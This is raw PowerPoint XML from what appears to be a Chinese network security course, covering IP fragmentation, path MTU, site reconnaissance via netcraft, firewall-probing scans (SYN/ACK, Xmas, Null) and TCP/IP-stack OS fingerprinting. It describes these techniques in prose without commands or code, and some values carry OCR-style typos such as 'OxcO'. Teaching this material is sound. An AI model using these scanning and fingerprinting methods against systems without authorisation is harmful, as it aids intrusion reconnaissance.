                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>包头的长度，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>层以上的协议层发送的数据报文的长度超过了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，则在发送者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>层将对数据报文进行分片，在接收者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>层对接收到的分片进行重组。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350474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87D93-DA27-4CFC-9628-3B825FD8F21D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32256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2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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路径最大传输</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="CC0033"/>
                </a:solidFill>
              </a:rPr>
              <a:t>单元</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="CC0033"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PMTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3648686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6FCCE-F386-4698-93B3-57B751F361BB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3819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19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8853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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3703655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itchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>netcraft.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>可以查询到的大部分知名的网站的信息。比如网站是运行在什么服务器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用什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务器</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甚至是网站在哪个机房。</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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348425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DD0D4E-0FD0-4317-A959-D76E90E6104C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3266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6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233596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Ctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>状态控制码</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2997667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EE039-7D77-47AE-95D6-C2379409ED7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3840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4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548276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10702-88E7-49F4-974D-B8D6E3C8CF4C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3307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0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213284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9741AB-5C76-4D5F-AC88-45FC19B6CC4D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336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6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529919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ECB339-4B6C-40EF-8423-20C7F4F79F4E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340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0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dirty="0"/>
              <a:t>SYN/ACK scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN/ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分组，测知防火墙的规则设计。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>确定防火墙是否只是简单的分组过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>只允许已建立好的连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；还是一个基于状态的防火墙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可执行高级的分组过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Xmas scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>往目标端口发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PUSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>置位的分组，若目标端口关闭，则返回一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分组；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Null scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：发送所有标识位复位的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分组；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2506875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845F4-0208-40AC-BFC4-DD43E114B0EF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3430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3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186713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99A139-AD57-4735-B217-DFF4749BD811}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3952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09577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AA14D-004F-4643-B271-0D39379983F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>82</a:t>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31926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DA246A4-337B-47D1-9FA8-BE6F9DDC863E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN"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558157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DD0D4E-0FD0-4317-A959-D76E90E6104C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3266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6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298961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一班</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>9-18</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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3491461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ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>序号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>序号时是不同的。如果发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN/PSH/URG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包到一个关闭的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口，大多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会把回应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的序号设置为发送的包的初始序号，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和一些打印机贝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>iJ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会发送序号为初始序号加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（服务类型）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口不可达消息，送回包的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值也是有差别的。大多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>OxcO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址掩码请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址屏蔽请求，有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会产生相应的应答，有些则不会。会产生应答的系统有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OpenVMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SUN Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等。在这些产生应答的系统中，对分片</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址屏蔽请求的应答又存在差别，可以做进一步的区分。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的响应</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送一个只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标志位的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包给一个打开的端口，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等系统不做响应；有些系统，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Windows,CISCO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HP/UX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等，则发回一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RESET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚假标记的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头里设置一个未定义的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标记，目标系统在响应时，有的会保持这个标记，有的不保持。还有一些系统在收到这样的包时会复位连接。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（初始化序列号）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
